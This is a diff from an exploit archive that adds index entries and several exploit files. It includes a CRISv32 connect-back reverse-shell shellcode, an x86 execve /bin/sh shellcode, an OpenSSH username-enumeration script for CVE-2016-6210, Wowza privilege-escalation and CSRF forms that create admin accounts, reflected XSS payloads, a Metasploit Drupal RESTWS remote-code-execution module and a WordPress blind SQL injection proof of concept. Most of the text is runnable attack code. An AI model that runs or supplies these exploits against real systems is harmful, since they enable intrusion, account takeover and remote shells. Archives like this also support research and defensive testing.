+20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
 20721,platforms/linux/local/20721.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0
 20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0
@ -36284,3 +36284,13 @@ id,file,description,date,author,platform,type,port
 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0
 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
 40128,platforms/lin_x86/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,lin_x86,shellcode,0
 40129,platforms/python/webapps/40129.txt,"Django CMS 3.3.0 - (Editor Snippet) Persistent XSS",2016-07-20,Vulnerability-Lab,python,webapps,80
 40130,platforms/php/remote/40130.rb,"Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
 40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
 40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Local Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0
 40133,platforms/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,multiple,webapps,8088
 40134,platforms/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF",2016-07-20,LiquidWorm,multiple,webapps,8088
 40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple XSS",2016-07-20,LiquidWorm,multiple,webapps,8088
 40136,platforms/linux/remote/40136.py,"OpenSSHD <= 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22
 40137,platforms/php/webapps/40137.html,"WordPress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80
--- a/platforms/lin_x86/shellcode/40128.c
+++ b/platforms/lin_x86/shellcode/40128.c
@ -0,0 +1,115 @@
 /*
 * Title: Axis Communication Linux/CRISv32 - Connect Back Shellcode
 * Author: bashis <mcw noemail.eu> / 2016
 * 
 */
 #include <stdio.h>
 char sc[] =
        //close(0) 
        "\x7a\x86"        // clear.d r10 
        "\x5f\x9c\x06\x00"  // movu.w 0x6,r9
        "\x3d\xe9"        // break 13
        //close(1)
        "\x41\xa2"        // moveq 1,r10
        "\x5f\x9c\x06\x00"  // movu.w 0x6,r9
        "\x3d\xe9"        // break 13
        //close(2)
        "\x42\xa2"        // moveq 2,r10
        "\x5f\x9c\x06\x00"  // movu.w 0x6,r9
        "\x3d\xe9"        // break 13
        //
        "\x10\xe1"        // addoq 16,sp,acr
        "\x42\x92"        // moveq 2,r9
        "\xdf\x9b"        // move.w r9,[acr]
        "\x10\xe1"        // addoq 16,sp,acr
        "\x02\xf2"        // addq 2,acr
        //PORT 443
        "\x5f\x9e\x01\xbb" // move.w 0xbb01,r9
        "\xdf\x9b"        // move.w r9,[acr]
        "\x10\xe1"        // addoq 16,sp,acr
        "\x6f\x96"        // move.d acr,r9
        "\x04\x92"        // addq 4,r9
        //IP 192.168.57.1
        "\x6f\xfe\xc0\xa8\x39\x01"   // move.d 139a8c0,acr
        "\xe9\xfb"        // move.d acr,[r9]
        //   
        //socket()
        "\x42\xa2"        // moveq 2,r10
        "\x41\xb2"        // moveq 1,r11
        "\x7c\x86"        // clear.d r12
        "\x6e\x96"        // move.d $sp,$r9
        "\xe9\xaf"        // move.d $r10,[$r9+]
        "\xe9\xbf"        // move.d $r11,[$r9+]
        "\xe9\xcf"        // move.d $r12,[$r9+]
        "\x41\xa2"        // moveq 1,$r10
        "\x6e\xb6"        // move.d $sp,$r11
        "\x5f\x9c\x66\x00"  // movu.w 0x66,$r9
        "\x3d\xe9"        // break 13
        //   
        "\x6a\x96"        // move.d $r10,$r9
        "\x0c\xe1"        // addoq 12,$sp,$acr
        "\xef\x9b"        // move.d $r9,[$acr]
        "\x0c\xe1"        // addoq 12,$sp,$acr
        "\x6e\x96"        // move.d $sp,$r9
        "\x10\x92"        // addq 16,$r9
        "\x6f\xaa"        // move.d [$acr],$r10
        "\x69\xb6"        // move.d $r9,$r11
        "\x50\xc2"        // moveq 16,$r12
        //   
        // connect()
        "\x6e\x96"        // move.d $sp,$r9
        "\xe9\xaf"        // move.d $r10,[$r9+]
        "\xe9\xbf"        // move.d $r11,[$r9+]
        "\xe9\xcf"        // move.d $r12,[$r9+]
        "\x43\xa2"        // moveq 3,$r10
        "\x6e\xb6"        // move.d $sp,$r11
        "\x5f\x9c\x66\x00"  // movu.w 0x66,$r9 
        "\x3d\xe9"        // break 13
        //   
        //dup(1)
        "\x6f\xaa"        // move.d [$acr],$r10
        "\x41\xb2"        // moveq 1,$r11
        "\x5f\x9c\x3f\x00"  // movu.w 0x3f,$r9
        "\x3d\xe9"        // break 13
        //   
        //dup(2)
        "\x6f\xaa"        // move.d [$acr],$r10
        "\x42\xb2"        // moveq 2,$r11
        "\x5f\x9c\x3f\x00"  // movu.w 0x3f,$r9
        "\x3d\xe9"        // break 13
        //execve("/bin/sh",NULL,NULL)
        "\x90\xe2"        // subq 16,$sp
        "\x6e\x96"        // move.d $sp,$r9
        "\x6e\xa6"        // move.d $sp,$10
        "\x6f\x0e\x2f\x2f\x62\x69"    // move.d 69622f2f,$r0
        "\xe9\x0b"        // move.d $r0,[$r9]
        "\x04\x92"        // addq 4,$r9
        "\x6f\x0e\x6e\x2f\x73\x68"    // move.d 68732f6e,$r0
        "\xe9\x0b"        // move.d $r0,[$r9]
        "\x04\x92"        // addq 4,$r9
        "\x79\x8a"        // clear.d [$r9]
        "\x04\x92"        // addq 4,$r9
        "\x79\x8a"        // clear.d [$r9]
        "\x04\x92"        // addq 4,$r9
        "\xe9\xab"        // move.d $r10,[$r9]
        "\x04\x92"        // addq 4,$r9
        "\x79\x8a"        // clear.d [$r9]
        "\x10\xe2"        // addq 16,$sp
        "\x6e\xf6"        // move.d $sp,$acr
        "\x6e\x96"        // move.d $sp,$r9
        "\x6e\xb6"        // move.d $sp,$r11
        "\x7c\x86"        // clear.d $r12
        "\x4b\x92"        // moveq 11,$r9
        "\x3d\xe9";        // break 13
 void 
 main(void) 
 {
 void (*s)(void);
 printf("sc size %d\n", sizeof(sc));
 s = sc;
 s();
 }
--- a/platforms/lin_x86/shellcode/40131.c
+++ b/platforms/lin_x86/shellcode/40131.c
@ -0,0 +1,37 @@
 /*
 # Linux/x86 - execve /bin/sh shellcode (19 bytes)
 # Author: sajith
 # Tested on: i686 GNU/Linux
 # Shellcode Length: 19
 # SLAE - 750
 Disassembly of section .text:
 08048060 <_start>:
 8048060: 31 c0 xor eax,eax
 8048062: 50 push eax
 8048063: 68 2f 2f 73 68 push 0x68732f2f
 8048068: 68 2f 62 69 6e push 0x6e69622f
 804806d: 87 e3 xchg ebx,esp
 804806f: b0 0b mov al,0xb
 8048071: cd 80 int 0x80
 ===============poc by sajith shetty=========================
 */
 #include<stdio.h>
 #include<string.h>
 unsigned char code[] = \
 "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80";
 main()
 {
 printf("Shellcode Length: %d\n", strlen(code));
 int (*ret)() = (int(*)())code;
 ret();
 }
--- a/platforms/linux/remote/40136.py
+++ b/platforms/linux/remote/40136.py
@ -0,0 +1,157 @@
 #!/usr/bin/python
 #
 # CVEs:                  CVE-2016-6210 (Credits for this go to Eddie Harari)
 #
 # Author:                0_o -- null_null
 #                        nu11.nu11 [at] yahoo.com
 #                        Oh, and it is n-u-one-one.n-u-one-one, no l's...
 #                        Wonder how the guys at packet storm could get this wrong :(
 # 
 # Date:                  2016-07-19
 # 
 # Purpose:               User name enumeration against SSH daemons affected by CVE-2016-6210. 
 # 
 # Prerequisites:         Network access to the SSH daemon.
 #
 # DISCLAIMER:            Use against your own hosts only! Attacking stuff you are not 
 #                        permitted to may put you in big trouble!
 #
 # And now - the fun part :-)
 # 
 import paramiko
 import time
 import numpy
 import argparse
 import sys
 args = None
 class bcolors:
  HEADER = '\033[95m'
  OKBLUE = '\033[94m'
  OKGREEN = '\033[92m'
  WARNING = '\033[93m'
  FAIL = '\033[91m'
  ENDC = '\033[0m'
  BOLD = '\033[1m'
  UNDERLINE = '\033[4m'
 def get_args():
  parser = argparse.ArgumentParser()
  group = parser.add_mutually_exclusive_group()
  parser.add_argument("host", type = str, help = "Give SSH server address like ip:port or just by ip")
  group.add_argument("-u", "--user", type = str, help = "Give a single user name")
  group.add_argument("-U", "--userlist", type = str, help = "Give a file containing a list of users")
  parser.add_argument("-e", "--enumerated", action = "store_true", help = "Only show enumerated users")
  parser.add_argument("-s", "--silent", action = "store_true", help = "Like -e, but just the user names will be written to stdout (no banner, no anything)")
  parser.add_argument("--bytes", default = 50000, type = int, help = "Send so many BYTES to the SSH daemon as a password")
  parser.add_argument("--samples", default = 12, type = int, help = "Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users")
  parser.add_argument("--factor", default = 3.0, type = float, help = "Used to compute the upper timing boundary for user enumeration")
  parser.add_argument("--trials", default = 1, type = int, help = "try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary")
  args = parser.parse_args()
  return args
 def get_banner(host, port):
  ssh = paramiko.SSHClient()
  ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  try:
    ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')
  except:
    banner = ssh.get_transport().remote_version
    ssh.close()
    return banner
 def connect(host, port, user):
  global args
  starttime = 0.0
  endtime = 0.0
  p = 'B' * int(args.bytes)
  ssh = paramiko.SSHClient()
  ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  starttime=time.clock()
  try:
    ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)
  except:
    endtime=time.clock()
  finally:
    ssh.close()
    return endtime - starttime
 def main():
  global args
  args = get_args()
  if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
  if not args.silent: print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\n\n")
  if args.host:
    host = args.host.split(":")[0]
    try:
      port = int(args.host.split(":")[1])
    except IndexError:
      port = 22
  users = []
  if args.user:
    users.append(args.user)
  elif args.userlist:
    with open(args.userlist, "r") as f:
      users = f.readlines()
  else:
    if not args.silent: print(bcolors.FAIL + "[!] " + bcolors.ENDC + "You must give a user or a list of users")
    sys.exit()
  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC +  ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)
  # get baseline timing for non-existing users...
  baseline_samples = []
  baseline_mean = 0.0
  baseline_deviation = 0.0
  if not args.silent: sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users")
  for i in range(1, int(args.samples) + 1):
    if not args.silent: sys.stdout.write('.')
    if not args.silent: sys.stdout.flush()
    sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))
    baseline_samples.append(sample)
  if not args.silent: sys.stdout.write('\n')
  # remove the biggest and smallest value
  baseline_samples.sort()
  baseline_samples.pop()
  baseline_samples.reverse()
  baseline_samples.pop()
  # do math
  baseline_mean = numpy.mean(numpy.array(baseline_samples))
  baseline_deviation = numpy.std(numpy.array(baseline_samples))
  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.")
  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.")
  upper = baseline_mean + float(args.factor) * baseline_deviation
  if not args.silent: print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.")
  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...")
  # 
  # Get timing for the given user name...
  #
  for u in users:
    user = u.strip()
    enum_samples = []
    enum_mean = 0.0
    for t in range(0, int(args.trials)):
      timeval = connect(host, port, user)
      enum_samples.append(timeval)
    enum_mean = numpy.mean(numpy.array(enum_samples))
    if (enum_mean < upper):
      if not (args.enumerated or args.silent) : 
        print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
    else:
      if not args.silent: 
        print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
      else: 
        print(user)
 if __name__ == "__main__":
  main()
--- a/platforms/multiple/webapps/40133.html
+++ b/platforms/multiple/webapps/40133.html
@ -0,0 +1,60 @@
 <!--
 Wowza Streaming Engine 4.5.0 Remote Privilege Escalation Exploit
 Vendor: Wowza Media Systems, LLC.
 Product web page: https://www.wowza.com
 Affected version: 4.5.0 (build 18676)
 Platform: JSP
 Summary: Wowza Streaming Engine is robust, customizable, and scalable
 server software that powers reliable video and audio streaming to any
 device. Learn the benefits of using Wowza Streaming Engine to deliver
 high-quality live and on-demand video content to any device.
 Desc: The application suffers from a privilege escalation issue. Normal
 user (read-only) can elevate his/her privileges by sending a POST request
 seting the parameter 'accessLevel' to 'admin' gaining admin rights and/or
 setting the parameter 'advUser' to 'true' and '_advUser' to 'on' gaining
 advanced admin rights.
 Advanced Admin:
 Allow access to advanced properties and features
 Only for expert Wowza Streaming Engine users.
 Tested on: Winstone Servlet Engine v1.0.5
           Servlet/2.5 (Winstone/1.0.5)
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2016-5340
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5340.php
 03.07.2016
 --
 Privilege escalation from existing read-only user to admin(advanced):
 -->
 <html>
  <body>
    <form action="http://localhost:8088/enginemanager/server/user/edit.htm" method="POST">
      <input type="hidden" name="version" value="0" />
      <input type="hidden" name="action" value="quickEdit" />
      <input type="hidden" name="userName" value="usermuser" />
      <input type="hidden" name="userPassword" value="" />
      <input type="hidden" name="userPassword2" value="" />
      <input type="hidden" name="accessLevel" value="admin" />
      <input type="hidden" name="advUser" value="true" />
      <input type="hidden" name="&#95;advUser" value="on" />
      <input type="hidden" name="ignoreWarnings" value="false" />
      <input type="submit" value="God mode" />
    </form>
  </body>
 </html>
--- a/platforms/multiple/webapps/40134.html
+++ b/platforms/multiple/webapps/40134.html
@ -0,0 +1,52 @@
 <!--
 Wowza Streaming Engine 4.5.0 CSRF Add Advanced Admin Exploit
 Vendor: Wowza Media Systems, LLC.
 Product web page: https://www.wowza.com
 Affected version: 4.5.0 (build 18676)
 Platform: JSP
 Summary: Wowza Streaming Engine is robust, customizable, and scalable
 server software that powers reliable video and audio streaming to any
 device. Learn the benefits of using Wowza Streaming Engine to deliver
 high-quality live and on-demand video content to any device.
 Desc: The application interface allows users to perform certain actions
 via HTTP requests without performing any validity checks to verify the
 requests. This can be exploited to perform certain actions with administrative
 privileges if a logged-in user visits a malicious web site.
 Tested on: Winstone Servlet Engine v1.0.5
           Servlet/2.5 (Winstone/1.0.5)
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2016-5341
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
 03.07.2016
 --
 -->
 <html>
  <body>
    <form action="http://localhost:8088/enginemanager/server/user/edit.htm" method="POST">
      <input type="hidden" name="version" value="0" />
      <input type="hidden" name="action" value="new" />
      <input type="hidden" name="userName" value="thricer" />
      <input type="hidden" name="userPassword" value="123123" />
      <input type="hidden" name="userPassword2" value="123123" />
      <input type="hidden" name="accessLevel" value="admin" />
      <input type="hidden" name="advUser" value="true" />
      <input type="hidden" name="&#95;advUser" value="on" />
      <input type="hidden" name="ignoreWarnings" value="false" />
      <input type="submit" value="Execute" />
    </form>
  </body>
 </html>
--- a/platforms/multiple/webapps/40135.txt
+++ b/platforms/multiple/webapps/40135.txt
@ -0,0 +1,117 @@
 Wowza Streaming Engine 4.5.0 Multiple Cross-Site Scripting Vulnerabilities
 Vendor: Wowza Media Systems, LLC.
 Product web page: https://www.wowza.com
 Affected version: 4.5.0 (build 18676)
 Platform: JSP
 Summary: Wowza Streaming Engine is robust, customizable, and scalable
 server software that powers reliable video and audio streaming to any
 device. Learn the benefits of using Wowza Streaming Engine to deliver
 high-quality live and on-demand video content to any device.
 Desc: Wowza Streaming Engine suffers from multiple reflected cross-site
 scripting vulnerabilities when input passed via several parameters to
 several scripts is not properly sanitized before being returned to the
 user. This can be exploited to execute arbitrary HTML and script code
 in a user's browser session in context of an affected site.
 Tested on: Winstone Servlet Engine v1.0.5
           Servlet/2.5 (Winstone/1.0.5)
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2016-5343
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
 03.07.2016
 --
 http://localhost:8088/enginemanager/applications/live/main/view.htm?vhost=_defaultVHost_&appName=live<script>alert(1)</script>
 http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3A42%3A32%2B02%3A00&periodEnd=2016-07-03T14%3a42%3a32%2b02%3a00<script>alert(2)</script>
 http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3a42%3a32%2b02%3a00<script>alert(3)</script>&periodEnd=2016-07-03T14%3A42%3A32%2B02%3A00
 http://localhost:8088/enginemanager/applications/liveedge/securityplayback/edit.htm?appName=test<script>alert(4)</script>&vhost=_defaultVHost_
 ---
 POST /enginemanager/applications/liveedge/main/edit.htm
 Host: localhost:8088
 vhost=_defaultVHost_";alert(5)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(6)</script>&section=main&version=1467548313123&action=new&description=desctest&mpegDash=true&_mpegDash=on&appleHLS=true&_appleHLS=on&adobeRTMP=true&_adobeRTMP=on&adobeHDS=true&_adobeHDS=on&msSmooth=true
 ---
 POST /enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm
 Host: localhost:8088
 vhost=_defaultVHost_&uiAppName=test";alert(7)//&uiAppType=Live+Edge+Application&instanceName=";alert(8)//&section=publishers_panasonic_camcorder";alert(9)//&version=0&driverName=Panasonic&publishersStreamFileName=panasonicstreamname&cameraIpAddress=1.1.1.1&appType=liveedge";alert(10)//&appName=test
 ---
 POST /enginemanager/applications/liveedge/securityplayback/edit.htm HTTP/1.1
 Host: localhost:8088
 vhost=_defaultVHost_";alert(11)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(12)</script>&section=securityplayback&version=1467549110876&_requireSecureRTMPConnection=on&secureTokenState=Protect+all+protocols+using+hash+(SecureToken+version+2)&sharedSecret=sharedtestsecret&hashAlgorithm=SHA
 ---
 POST /enginemanager/applications/liveedge/streamtarget/add.htm HTTP/1.1
 Host: localhost:8088
 enabled=true&protocol=RTMP&destinationName=akamai&destApplicationRequired=false&destAppInstanceRequired=false&usernameRequired=true&passwordRequired=true&wowzaCloudDestinationType=1*/alert(13)//&facebookAccessToken=&facebookDestName=&facebookDestId=&facebookEventSourceName=&wowzaDotComFacebookUrl=https%3A%2F%2Ffb.wowza.com%2Fwsem%2Fstream_targets%2Fv1&connectionCode=&protocolShoutcast=Shoutcast
 ---
 -------------------------------------------------------------------------------------------------------------------
 |                                  Script                                        |            Parameter           |
 -------------------------------------------------------------------------------------------------------------------
                                                                                 |                                |
 /enginemanager/applications/live/main/view.htm                                   |    appName                     |
 /enginemanager/applications/liveedge/main/edit.htm                               |    uiAppType                   |
 /enginemanager/applications/liveedge/main/edit.htm                               |    vhost                       |
 /enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm  |    appType                     |
 /enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm  |    instanceName                |
 /enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm  |    section                     |
 /enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm  |    uiAppType                   |
 /enginemanager/applications/liveedge/securityplayback/edit.htm                   |    appName                     |
 /enginemanager/applications/liveedge/securityplayback/edit.htm                   |    uiAppType                   |
 /enginemanager/applications/liveedge/securityplayback/edit.htm                   |    vhost                       |
 /enginemanager/applications/liveedge/streamtarget/add.htm                        |    wowzaCloudDestinationType   |
 /enginemanager/applications/liveedge/streamtarget/wizard.htm                     |    appName                     |
 /enginemanager/applications/liveedge/streamtarget/wizard.htm                     |    vhost                       |
 /enginemanager/applications/monitoring/historical.jsdata                         |    periodEnd                   |
 /enginemanager/applications/monitoring/historical.jsdata                         |    periodStart                 |
 /enginemanager/applications/new.htm                                              |    uiAppName                   |
 /enginemanager/server/mediacachesource/edit.htm                                  |    action                      |
 /enginemanager/server/mediacachesource/edit.htm                                  |    maxTTLDays                  |
 /enginemanager/server/mediacachesource/edit.htm                                  |    maxTTLHours                 |
 /enginemanager/server/mediacachesource/edit.htm                                  |    maxTTLMinutes               |
 /enginemanager/server/mediacachesource/edit.htm                                  |    maxTTLSeconds               |
 /enginemanager/server/mediacachesource/edit.htm                                  |    minTTLDays                  |
 /enginemanager/server/mediacachesource/edit.htm                                  |    minTTLHours                 |
 /enginemanager/server/mediacachesource/edit.htm                                  |    minTTLMinutes               |
 /enginemanager/server/mediacachesource/edit.htm                                  |    minTTLSeconds               |
 /enginemanager/server/mediacachestore/edit.htm                                   |    action                      |
 /enginemanager/server/transcoderencode/edit.htm                                  |    action                      |
 /enginemanager/server/transcoderencode/edit.htm                                  |    appType                     |
 /enginemanager/server/transcoderencode/edit.htm                                  |    templateName                |
 /enginemanager/server/vhost/streamfile/new.htm                                   |    streamName                  |
 /enginemanager/transcoder/new.htm                                                |    appType                     |
 /enginemanager/transcoder/new.htm                                                |    dstTemplate                 |
 /enginemanager/applications/monitoring/app.jsdata                                |    appName                     |
 /enginemanager/applications/monitoring/historical.jsdata                         |    appName                     |
 /enginemanager/applications/monitoring/historical.jsdata                         |    vhost                       |
 /enginemanager/server/logs/getlog.jsdata                                         |    filter                      |
 /enginemanager/server/logs/getlog.jsdata                                         |    logMode                     |
 /enginemanager/server/logs/getlog.jsdata                                         |    logName                     |
 /enginemanager/server/logs/getlog.jsdata                                         |    logType                     |
                                                                                 |                                |
 ---------------------------------------------------------------------------------|--------------------------------|
--- a/platforms/php/remote/40130.rb
+++ b/platforms/php/remote/40130.rb
@ -0,0 +1,86 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Drupal RESTWS Module 7.x Remote PHP Code Execution',
      'Description'    => %q{
        This module exploits the Drupal RESTWS module vulnerability.
        RESTWS alters the default page callbacks for entities to provide
        additional functionality. A vulnerability in this approach allows
        an unauthenticated attacker to send specially crafted requests resulting
        in arbitrary PHP execution
        This module was tested against RESTWS 7.x with Drupal 7.5
 installation on Ubuntu server.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Devin Zuczek',                        # discovery
          'Mehmet Ince <mehmet@mehmetince.net>'  # msf module
        ],
      'References'     =>
        [
          ['URL', 'https://www.drupal.org/node/2765567'],
          ['URL',
 'https://www.mehmetince.net/exploit/drupal-restws-module-7x-remote-php-code-execution']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['Automatic', {}] ],
      'DisclosureDate' => 'Jul 13 2016',
      'DefaultTarget'  => 0
      ))
    register_options(
      [
        OptString.new('TARGETURI', [ true, "The target URI of the
 Drupal installation", '/'])
      ], self.class
    )
  end
  def check
    r = rand_text_alpha(8 + rand(4))
    url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r
 , "/passthru/echo%20#{r}")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => url
    )
    if res && res.body =~ /#{r}/
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end
  def exploit
    random = rand_text_alpha(1 + rand(2))
    url = normalize_uri(target_uri.path,
      "?q=taxonomy_vocabulary/",
      random ,
      "/passthru/",
      Rex::Text.uri_encode("php -r
 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
    )
    send_request_cgi(
      'method' => 'GET',
      'uri' => url
    )
  end
 end
--- a/platforms/php/webapps/40137.html
+++ b/platforms/php/webapps/40137.html
@ -0,0 +1,116 @@
 <!--
 Multiple SQL injection vulnerabilities in WordPress Video Player
 Abstract
 It was discovered that WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.
 Contact
 For feedback or questions about this advisory mail us at sumofpwn at securify.nl
 The Summer of Pwnage
 This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
 OVE ID
 OVE-20160712-0004
 Tested versions
 This issue was successfully tested on WordPress Video Player WordPress plugin version 1.5.16.
 Fix
 This issue is resolved in WordPress Video Player 1.5.18.
 Introduction
 WordPress Video Player is a WordPress video plugin that allows you to easily add videos to your website. WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.
 Details
 The vulnerabilities exist in the functions show_tag(), spider_video_select_playlist(), and spider_video_select_video(). The author tried to prevent SQL injection by calling the esc_sql() WordPress function. However, the user input is used in the ORDER BY clause and is consequently not quoted. Due to this it is possible to inject arbitrary SQL statements despite the use of esc_sql()
 show_tag():
 [...]
 if (isset($_POST['page_number'])) {
   if ($_POST['asc_or_desc']) {
      $sort["sortid_by"] = esc_sql(esc_html(stripslashes($_POST['order_by'])));
      if ($_POST['asc_or_desc'] == 1) {
         $sort["custom_style"] = "manage-column column-title sorted asc";
         $sort["1_or_2"] = "2";
         $order = "ORDER BY " . $sort["sortid_by"] . " ASC";
      } else {
         $sort["custom_style"] = "manage-column column-title sorted desc";
         $sort["1_or_2"] = "1";
         $order = "ORDER BY " . $sort["sortid_by"] . " DESC";
      }
   }
 spider_video_select_playlist():
 [...]
 if(isset($_POST['page_number']))
 {
   if($_POST['asc_or_desc'])
   {
      $sort["sortid_by"]=esc_sql(esc_html(stripslashes($_POST['order_by'])));
      if($_POST['asc_or_desc']==1)
      {
         $sort["custom_style"]="manage-column column-title sorted asc";
         $sort["1_or_2"]="2";
         $order="ORDER BY ".$sort["sortid_by"]." ASC";
      }
      else
      {
         $sort["custom_style"]="manage-column column-title sorted desc";
         $sort["1_or_2"]="1";
         $order="ORDER BY ".$sort["sortid_by"]." DESC";
      }
   }
 function spider_video_select_video():
 [...]
 if(isset($_POST['page_number']))
 {
      if($_POST['asc_or_desc'])
      {
         $sort["sortid_by"]=esc_html(stripslashes($_POST['order_by']));
         if($_POST['asc_or_desc']==1)
         {
            $sort["custom_style"]="manage-column column-title sorted asc";
            $sort["1_or_2"]="2";
            $order="ORDER BY ".esc_sql($sort["sortid_by"])." ASC";
         }
         else
         {
            $sort["custom_style"]="manage-column column-title sorted desc";
            $sort["1_or_2"]="1";
            $order="ORDER BY ".esc_sql($sort["sortid_by"])." DESC";
         }
      }
 Proof of concept
 -->
 <html>
   <body>
      <form action="http://<target>/wp-admin/admin-ajax.php?action=spiderVeideoPlayerselectplaylist" method="POST">
         <input type="hidden" name="search_events_by_title" value="" />
         <input type="hidden" name="page_number" value="0" />
         <input type="hidden" name="serch_or_not" value="" />
         <input type="hidden" name="asc_or_desc" value="1" />
         <input type="hidden" name="order_by" value="(CASE WHEN (SELECT sleep(10)) = 1 THEN id ELSE title END) ASC #" />
         <input type="hidden" name="option" value="com_Spider_Video_Player" />
         <input type="hidden" name="task" value="select_playlist" />
         <input type="hidden" name="boxchecked" value="0" />
         <input type="hidden" name="filter_order_playlist" value="" />
         <input type="hidden" name="filter_order_Dir_playlist" value="" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
 </html>
--- a/platforms/python/webapps/40129.txt
+++ b/platforms/python/webapps/40129.txt
@ -0,0 +1,349 @@
 Document Title:
 ===============
